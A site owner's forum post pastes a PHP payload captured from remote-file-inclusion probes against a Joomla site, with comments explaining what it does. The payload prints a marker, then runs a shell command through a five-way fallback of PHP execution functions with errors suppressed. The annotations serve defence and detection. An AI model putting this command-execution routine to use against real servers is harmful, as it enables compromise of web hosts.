I don’t know about anyone else but I have my security set to on with sh404sef.
So today I decided I would actually take a look at my logs and I found 84 mos_config attacks.
There were multiple websites that tried to pass in a .txt file, which I will post below. I was just curious whether anyone knows what the functions he’s trying to pass actually do.
<?php
// Captured payload from a remote-file-inclusion probe (the requests logged
// above as "mos_config" attacks pointed at this file, hosted as a .txt).
// NOTE(review): the blog software has replaced the ASCII quotes with
// typographic ones, so this listing is for reading only and does not parse
// as pasted.
//
// Prints a fixed marker string; presumably the sender searches the HTTP
// response for it to learn whether the included file was executed.
echo “Mic22”;
// The command to run. `id` only reports the account and groups the web
// server process runs as, so this is a "does it work?" check, not yet a
// destructive action.
$cmd=”id”;
// ex() (defined below) runs the command through whichever PHP
// command-execution function is available and returns the output.
$eseguicmd=ex($cmd);
// Writes the command output into the response. For a defender: a response
// body containing the marker followed by `id` output means the site really
// executed the remote file and should be treated as compromised.
echo $eseguicmd;
/**
 * Runs an operating-system command and returns whatever it printed.
 *
 * Tries five PHP mechanisms in order (exec, shell_exec, system, passthru,
 * popen) and uses the first one that is present. The fallback chain means
 * that blocking only one or two of these functions does not stop the
 * payload; a hardened host has to cover all of them (for example via the
 * `disable_functions` ini directive) and, more importantly, fix the
 * inclusion flaw that let the file be loaded (no request-controlled
 * include paths, `allow_url_include` off).
 *
 * Every call is prefixed with `@`, which suppresses PHP warnings so a
 * failed attempt leaves nothing in the rendered page.
 *
 * @param string $cfe Command line to execute.
 * @return mixed Captured output of the command, or the initial empty value
 *               when $cfe is empty or no mechanism was usable.
 */
function ex($cfe){
// Default result when nothing can be executed.
$res = ”;
// Skip everything for an empty command string.
if (!empty($cfe)){
// 1) exec(): collects the output lines into the array $res ...
if(function_exists(‘exec’)){
@exec($cfe,$res);
// ... which are then joined into one string. The separator is shown as "n";
// presumably a newline escape whose backslash the blog stripped.
$res = join(“n”,$res);
}
// 2) shell_exec(): returns the whole output as a single string.
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
// 3) system(): prints output directly, so output buffering is used to
//    capture it into $res instead of letting it go straight to the page.
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
// 4) passthru(): same buffering trick as for system().
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
// 5) popen(): last resort. There is no function_exists() check here; the
//    call is simply attempted and the branch is taken only if it yields a
//    valid pipe resource.
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
// Read the command's output from the pipe in 1024-byte chunks until EOF.
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
// Ends the request as soon as the output has been printed, so nothing from
// the page that included this file is rendered after it.
exit;